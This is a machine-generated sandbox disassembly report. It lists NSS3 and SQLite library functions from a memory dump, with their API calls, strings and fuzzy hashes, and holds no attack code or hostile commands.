Part of subcall function 6C70F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C70F796
Part of subcall function 6C70F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C70F79F
Part of subcall function 6C70F670: SECITEM_DupItem_Util.NSS3 ref: 6C70F7F0

Part of subcall function 6C733440: PK11_GetAllTokens.NSS3 ref: 6C733481
Part of subcall function 6C733440: PR_SetError.NSS3(00000000,00000000), ref: 6C7334A3
Part of subcall function 6C733440: TlsGetValue.KERNEL32 ref: 6C73352E
Part of subcall function 6C733440: EnterCriticalSection.KERNEL32(?), ref: 6C733542
Part of subcall function 6C733440: PR_Unlock.NSS3(?), ref: 6C73355B

SECITEM_DupItem_Util.NSS3(?), ref: 6C70FDAD

Part of subcall function 6C73FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C6E9003,?), ref: 6C73FD91
Part of subcall function 6C73FD80: PORT_Alloc_Util.NSS3(A4686C74,?), ref: 6C73FDA2
Part of subcall function 6C73FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C74,?,?), ref: 6C73FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C70FE00

Part of subcall function 6C73FD80: free.MOZGLUE(00000000,?,?), ref: 6C73FDD1

Part of subcall function 6C72E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72E5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C70FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6C70FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C70FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C70FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C70FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C70FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C70FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C710007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C710029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C710044

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 667aa5c0a4f7e6479cbaee03ad42ddd7c4a81b3741b111f497a5c88e07d06d83
Instruction ID: 2223c1ca64303eb0178a77d426b6f2889634ab96335ed27c1d99b0bfc8534c61
Opcode Fuzzy Hash: 667aa5c0a4f7e6479cbaee03ad42ddd7c4a81b3741b111f497a5c88e07d06d83
Instruction Fuzzy Hash: 17B1C5B16043019FE304CF29C944A6BB7E5FF88318F548A2DE959C7B81E770E945CB91

Function 6C707D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6C707DDC

Part of subcall function 6C7407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6E8298,?,?,?,6C6DFCE5,?), ref: 6C7407BF
Part of subcall function 6C7407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7407E6
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C74081B
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C740825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C707DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C707F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6C707F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C707F98
PK11_FreeSymKey.NSS3(?), ref: 6C707FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C707FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C708000

Part of subcall function 6C729430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C707F0C,?,00000000,00000000,00000000,?), ref: 6C72943B
Part of subcall function 6C729430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C72946B
Part of subcall function 6C729430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C729546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C708110
PK11_FreeSymKey.NSS3(00000000), ref: 6C70811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C70822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C70823C

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: b289988a039806b487f107d27b8001fa1690229734ecd31d7f2bc415bb73f635
Instruction ID: 97535d062e8041855d2648510f21baf9b17a6574629f7fe000969252f82f910e
Opcode Fuzzy Hash: b289988a039806b487f107d27b8001fa1690229734ecd31d7f2bc415bb73f635
Instruction Fuzzy Hash: D8C17DB1E002199FEB21CF14CD44FEAB7B9AF15348F0481E9E91DA6641E7319E85CFA1

Function 6C710EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C710F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C710FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C711006
PK11_FreeSymKey.NSS3(?), ref: 6C71101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C711033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C71103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C711048
memcpy.VCRUNTIME140(?,?,?), ref: 6C71108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7110BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7110D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C71112E

Part of subcall function 6C711570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C7108C4,?,?), ref: 6C7115B8
Part of subcall function 6C711570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C7108C4,?,?), ref: 6C7115C1
Part of subcall function 6C711570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C71162E
Part of subcall function 6C711570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C711637

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: a3e3867451cafca517599972d3175b1240d6a7dff46099f0f34fad2991f9b930
Instruction ID: d3f256f2775afdb2b3a2594ea1ceb9de10183e5929a552ba5e03867d835e2d42
Opcode Fuzzy Hash: a3e3867451cafca517599972d3175b1240d6a7dff46099f0f34fad2991f9b930
Instruction Fuzzy Hash: 0771E1B1E082058FDB00CFA5CE89A6AF7B4BF54318F19863CE5199BB11E731D954CB90

Function 6C731CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C731F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C732166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C73228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C7323B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C73241C

Strings

token, xrefs: 6C731F2C
manufacturer, xrefs: 6C732179
serial, xrefs: 6C7322A2
model, xrefs: 6C7323CB, 6C7323EC

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 4d4c1c80620feed526e22503e79cbf564b5d51fe042931a905e3cdd916281f1a
Instruction ID: d67e6df392c658315ecc6ca764901fce8265acef4dc128881765a4761fb7c2f6
Opcode Fuzzy Hash: 4d4c1c80620feed526e22503e79cbf564b5d51fe042931a905e3cdd916281f1a
Instruction Fuzzy Hash: BF024162D0C7D86EF7318271CA4C3D76AE09B4532CF0D267EC9DE4A6C3C7A859898395

Function 6C736C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C6E1C6F,00000000,00000004,?,?), ref: 6C736C3F

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C6E1C6F,00000000,00000004,?,?), ref: 6C736C60
PR_ExplodeTime.NSS3(00000000,6C6E1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C6E1C6F,00000000,00000004,?,?), ref: 6C736C94

Strings

gfff, xrefs: 6C736CFD
gfff, xrefs: 6C736CF5
gfff, xrefs: 6C736D30
gfff, xrefs: 6C736D9C
gfff, xrefs: 6C736D66

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 126a6a5d02290b677edf7cef2377ef4f4b0f185e424a42876976433a766953f7
Instruction ID: 73bc6132223f2aee67ffe4e15405be2c3f6f954c2609865aa0eca4ee98c66aaa
Opcode Fuzzy Hash: 126a6a5d02290b677edf7cef2377ef4f4b0f185e424a42876976433a766953f7
Instruction Fuzzy Hash: C3516C72B015494FC70CCDADDC526DAB7DAABE4310F48C23AE441CB786D638E906C751

Function 6C7B0F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C7B1027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7B10B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7B1353

Strings

zeroblob(%d), xrefs: 6C7B1223
$, xrefs: 6C7B12A0
-- , xrefs: 6C7B0FF5
%02x, xrefs: 6C7B12F6
NULL, xrefs: 6C7B119E
%lld, xrefs: 6C7B114B
'%.*q', xrefs: 6C7B1217, 6C7B1292

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: c627d98f70d3067f57f71f61888065c6e6935966d5e8c4f191e36867f4dd96ca
Instruction ID: 0a46a6c47e0c9d32d5b8ce9205911ff80d812315b6d343e0bb2fe1e6ca066077
Opcode Fuzzy Hash: c627d98f70d3067f57f71f61888065c6e6935966d5e8c4f191e36867f4dd96ca
Instruction Fuzzy Hash: D6E1B071A083409FD714CF18C584A6BBBF1BF86348F14892DF99997B51E771E849CB82

Function 6C7B8FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7B8FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B90DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B9118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B91C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7B9209

Strings

3333, xrefs: 6C7B925E
UUUU, xrefs: 6C7B9255

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 3b9550d640c582fa51c17fb080d4393e652a6de6ff96073aa5dd5251923233f3
Instruction ID: 6dae2010d4165024bd6f31b01b781d257f45bd5e7139097f77445f5de3022d13
Opcode Fuzzy Hash: 3b9550d640c582fa51c17fb080d4393e652a6de6ff96073aa5dd5251923233f3
Instruction Fuzzy Hash: 84A19D72E001159BDB04CF69CD84BAEB7B5AB98328F094139E915B7341E736AC51CBE0

Function 6C670FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C66CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6CF9C9,?,6C6CF4DA,6C6CF9C9,?,?,6C69369A), ref: 6C66CA7A
Part of subcall function 6C66CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C66CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C67103E
EnterCriticalSection.KERNEL32(?), ref: 6C671139
LeaveCriticalSection.KERNEL32(?), ref: 6C671190
sqlite3_free.NSS3(00000000), ref: 6C671227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C67126E
sqlite3_free.NSS3(?), ref: 6C67127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C671267
winAccess, xrefs: 6C67129B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: 9c82adf2ebd5ecad8183b66b6019ae66fb1fb4b5c8899c7b01487ebfed0f61a1
Instruction ID: 0d6e8003dd02647335e4f1024879334f06dff36ab4116841edba2a4ce1437c15
Opcode Fuzzy Hash: 9c82adf2ebd5ecad8183b66b6019ae66fb1fb4b5c8899c7b01487ebfed0f61a1
Instruction Fuzzy Hash: 0C710D317052019BDB349F65DC69A6A3375FB8631CF144A3AE92987A80DB30DC45C7EA

Function 6C67AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C79CF46,?,6C66CDBD,?,6C79BF31,?,?,?,?,?,?,?), ref: 6C67B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C79CF46,?,6C66CDBD,?,6C79BF31), ref: 6C67B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C79CF46,?,6C66CDBD,?,6C79BF31), ref: 6C67B0A2
CloseHandle.KERNEL32(?,?,6C79CF46,?,6C66CDBD,?,6C79BF31,?,?,?,?,?,?,?,?,?), ref: 6C67B100
sqlite3_free.NSS3(?,?,00000002,?,6C79CF46,?,6C66CDBD,?,6C79BF31,?,?,?,?,?,?,?), ref: 6C67B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C79CF46,?,6C66CDBD,?,6C79BF31), ref: 6C67B12D

Part of subcall function 6C669EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C67C6FD,?,?,?,?,6C6CF965,00000000), ref: 6C669F0E
Part of subcall function 6C669EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C6CF965,00000000), ref: 6C669F5D

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: e39914135e6ce69d1a8bca84dcec0f2b1e11374a7b22c899eb8f52da2c129ec6
Instruction ID: 3f1649fbc20a4542021a2d356872a312e1996ca86ba1c47b0749641411b8d9a4
Opcode Fuzzy Hash: e39914135e6ce69d1a8bca84dcec0f2b1e11374a7b22c899eb8f52da2c129ec6
Instruction Fuzzy Hash: 339122B0A002058FDB24DF64D884BABB7B1FF8530CF145A3DE41697A51EB34E841CBA9

Function 6C74BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C74BD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C74BD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C74BD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C74BD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C74BDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C74BDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C74BDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C74BE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C74BE1E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: 17cd2752d8c1335979cb5f72cc6bb5c77e8dbf51dc9995aa876d044af7b2dd31
Instruction ID: c61579d8dfdd0a6e0271628b728e14d5ddfb73ad9296c94b3315ad994f519c60
Opcode Fuzzy Hash: 17cd2752d8c1335979cb5f72cc6bb5c77e8dbf51dc9995aa876d044af7b2dd31
Instruction Fuzzy Hash: D021F97AE0069967FB0046579E4BF8F36789BE174DF084434FA16EEA41F310B818C6A1

Function 6C7F8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8414E4,6C7ACC70), ref: 6C7F8D47
PR_GetCurrentThread.NSS3 ref: 6C7F8D98

Part of subcall function 6C6D0F00: PR_GetPageSize.NSS3(6C6D0936,FFFFE8AE,?,6C6616B7,00000000,?,6C6D0936,00000000,?,6C66204A), ref: 6C6D0F1B
Part of subcall function 6C6D0F00: PR_NewLogModule.NSS3(clock,6C6D0936,FFFFE8AE,?,6C6616B7,00000000,?,6C6D0936,00000000,?,6C66204A), ref: 6C6D0F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C7F8E7B
htons.WSOCK32(?), ref: 6C7F8EDB
PR_GetCurrentThread.NSS3 ref: 6C7F8F99
PR_GetCurrentThread.NSS3 ref: 6C7F910A

Strings

%u.%u.%u.%u, xrefs: 6C7F8E74

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: b59d610a7acaf3b86ca49c64778bccd41d78896be4d1a14d9f2a5b6f1553c8d6
Instruction ID: fe47ff1990f279ef74d65219c34a74a68ee80f6a352a92b3503de4580e95faee
Opcode Fuzzy Hash: b59d610a7acaf3b86ca49c64778bccd41d78896be4d1a14d9f2a5b6f1553c8d6
Instruction Fuzzy Hash: 2B029C329052518FDB148F1AC5D8366BBA2EF53348F29837AD8B15BBA2C331D946C790

Function 6C67EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

sqlite_temp_master, xrefs: 6C67F0A6, 6C67F2D5
authorizer malfunction, xrefs: 6C67F95C, 6C67F9BF, 6C67FA5E, 6C67FA8B
there is already an index named %s, xrefs: 6C67F9D7
not authorized, xrefs: 6C67F957, 6C67F9BA
temporary table name must be unqualified, xrefs: 6C67F734
table, xrefs: 6C67F05C, 6C67FABC, 6C67FAC7
view, xrefs: 6C67F061, 6C67F071, 6C67FAB7
sqlite_master, xrefs: 6C67F0AB, 6C67F2DA, 6C67F757, 6C67F93E
%s %T already exists, xrefs: 6C67FAC8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 77b0db550c90938590a4f8cd62ec905ec992303b89655e589c59e297500b1897
Instruction ID: 5bc2feaa2e5800a73827fed911c18735e4b67a40d608664c1640779f23da2162
Opcode Fuzzy Hash: 77b0db550c90938590a4f8cd62ec905ec992303b89655e589c59e297500b1897
